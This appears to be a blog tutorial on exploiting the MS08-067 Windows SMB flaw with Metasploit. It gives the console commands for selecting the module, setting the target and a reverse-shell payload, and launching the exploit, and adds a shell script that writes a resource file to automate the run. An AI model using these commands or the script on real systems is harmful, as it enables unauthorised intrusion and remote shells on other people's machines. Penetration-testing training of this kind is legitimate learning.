Starting up with METASPLOIT & Attack.

Let's get started and go for our first attack to compromise a system. In Kali Linux, Metasploit is installed by default, so we can start it from any directory.
Before starting Metasploit, start the PostgreSQL database. Metasploit connects to it to keep track of what you do (hosts, services, credentials and sessions survive between runs).

root@kali:~# service postgresql start

Now we're all set to start the Metasploit service. On older Kali releases the command below also initialises the database, creating a PostgreSQL user named "msf3", and starts the Metasploit web server. Note that the service name is lower-case; Linux service names are case-sensitive. On current Kali releases there is no metasploit service any more and the database is set up once with msfdb init instead.

root@kali:~# service metasploit start

Now we can enter the console with the msfconsole command:

root@kali:~# msfconsole

Don't be alarmed if it takes a while to start; it is loading its modules. Once it has finished, you'll see an ASCII-art banner, the Metasploit version and a count of the available exploits, payloads and other modules.

[Screenshot: msfconsole banner]

We'll skip the very basics and move straight on to our exploit.

Finding the METASPLOIT Modules:

We will exploit a vulnerability in our Windows XP victim that Microsoft patched in Security Bulletin MS08-067.
MS08-067 (2008) is a stack corruption bug in the relative path canonicalization code of the Server service, in netapi32.dll. It is reached by sending a crafted remote procedure call (RPC) request over the Server Message Block (SMB) service, and a successful exploit gives the attacker control of the target system. The vulnerability is especially critical because, on Windows XP, the attacker does not need to authenticate to the target machine first.
For more details, you can visit the Metasploit online database of modules:
(http://www.rapid7.com/db/modules/)

[Screenshot: Rapid7 online module database]
Or just search from within the console:

msf > search ms08-067

Matching Modules
================

Name Disclosure Date Rank Description
 ---- --------------- ---- -----------
 exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption

This gives us the module's full name, which we pass to the info command for more details:

msf > info exploit/windows/smb/ms08_067_netapi

Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Disclosed: 2008-10-28

Provided by:
hdm <x@hdm.io>
Brett Moore <brett.moore@insomniasec.com>
frank2 <frank2@dc949.org>
jduck <jduck@metasploit.com>

Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal

Read through the output. If anything in it is unclear, just ask in the comments below.

To select this module in Metasploit (the leading "exploit/" may be omitted):

msf > use windows/smb/ms08_067_netapi

[Screenshot: use and set payload commands]

Metasploit obviously needs some information from you about the attacker and the victim; it cannot guess them. Use show options to see which settings the module requires:

msf exploit(ms08_067_netapi) > show options

[Screenshot: show options output for the exploit]
RHOST: the remote host we want to exploit. Our target is the Windows XP machine, so we set RHOST to its IP address:

msf exploit(ms08_067_netapi) > set RHOST <target IP>

RPORT: the remote port. RPORT is already set to 445, the default port for SMB over TCP, so it can be left alone.

SMBPIPE: the SMB named pipe through which the Server service's RPC interface is reached. It defaults to BROWSER; the module also accepts SRVSVC, which is worth trying if the BROWSER pipe is unavailable on the target.

To list the operating system versions this module can target:

msf exploit(ms08_067_netapi) > show targets

Exploit targets:

Id Name
 -- ----
 0 Automatic Targeting
 1 Windows 2000 Universal
 2 Windows XP SP0/SP1 Universal
 3 Windows 2003 SP0 Universal
 4 Windows XP SP2 English (AlwaysOn NX)
 5 Windows XP SP2 English (NX)
 6 Windows XP SP3 English (AlwaysOn NX)
 7 Windows XP SP3 English (NX)
...............

The target is set to 0 (Automatic Targeting) by default: the module fingerprints the OS version and language over SMB and picks the matching entry. Automatic targeting is usually right for XP, but if it picks wrongly the exploit can crash the target's Server service instead of returning a shell, so when you know the exact service pack and language it is safer to choose the matching target explicitly with set TARGET.

It now looks as though we are all set, but we still have not told the exploit what to do once the target is compromised.
For this Metasploit has PAYLOADS, the code that runs on the target after the exploit succeeds, which we choose according to our needs. To find a suitable one:

msf exploit(ms08_067_netapi) > show payloads

[Screenshot: payload list for the exploit]

This lists every payload compatible with the selected exploit.

Here we set the payload manually:

msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp

This is a reverse shell: after exploitation the target connects back to us and hands over a command shell. For that the payload needs the attacker's IP address (LHOST) and the port we listen on (LPORT); run show options again to see and set them. A reverse connection is preferred over a bind shell because it works even when a firewall blocks inbound connections to the target.

And finally, run the exploit:

msf exploit(ms08_067_netapi) > exploit
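The whole sequence above (select the module, set RHOST, keep RPORT and SMBPIPE, pick a target, set the payload and its LHOST/LPORT, then launch) can be replayed without typing it into the console each time. As an added example that is not part of the original post, the shell function below validates the addresses and writes a Metasploit resource file; msfconsole's -r option then executes those commands in order. The addresses 10.0.0.5 and 10.0.0.2 in the usage line are constructed placeholders, check is the module's own pre-flight test, and exploit -j runs the exploit as a background job so the console stays usable.

```shell
#!/bin/sh
# Added example: generate a Metasploit resource (.rc) script for the
# MS08-067 walkthrough. Not code from the original post; addresses used
# in the usage line are constructed placeholders.

# is_ipv4 ADDR -> exit 0 if ADDR is a dotted-quad IPv4 address with every
# octet in 0..255, exit 1 otherwise. Catches typos before msfconsole does.
is_ipv4() {
    echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    for o in $(echo "$1" | tr . ' '); do
        [ "$o" -le 255 ] || return 1
    done
    return 0
}

# build_rc RHOST LHOST [LPORT] [TARGET]
# Prints the resource script to stdout. LPORT defaults to 4444 and TARGET
# to 0 (Automatic Targeting); pass the id from "show targets" to override.
build_rc() {
    rhost=$1; lhost=$2; lport=${3:-4444}; target=${4:-0}
    is_ipv4 "$rhost" || { echo "bad RHOST: $rhost" >&2; return 1; }
    is_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    case $lport in
        ''|*[!0-9]*) echo "bad LPORT: $lport" >&2; return 1 ;;
    esac
    [ "$lport" -ge 1 ] && [ "$lport" -le 65535 ] || {
        echo "bad LPORT: $lport" >&2; return 1; }
    case $target in
        ''|*[!0-9]*) echo "bad TARGET: $target" >&2; return 1 ;;
    esac

    cat <<EOF
# resource script generated by build_rc
db_status
use exploit/windows/smb/ms08_067_netapi
set RHOST $rhost
set RPORT 445
set SMBPIPE BROWSER
set TARGET $target
set PAYLOAD windows/shell_reverse_tcp
set LHOST $lhost
set LPORT $lport
show options
check
exploit -j
EOF
}

# Usage: write the script, then replay it quietly in msfconsole.
#   build_rc 10.0.0.5 10.0.0.2 4444 > ms08_067.rc && msfconsole -q -r ms08_067.rc
```

The validation matters more than it looks: a mistyped LHOST means the payload connects back to the wrong machine, and the exploit has already run against the target by the time you notice.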

[Screenshot: successful exploitation of the Windows XP target]

Congratulations: You have successfully exploited your first machine!

Stay tuned for the next post, which covers what we can do once we have a session on the target.
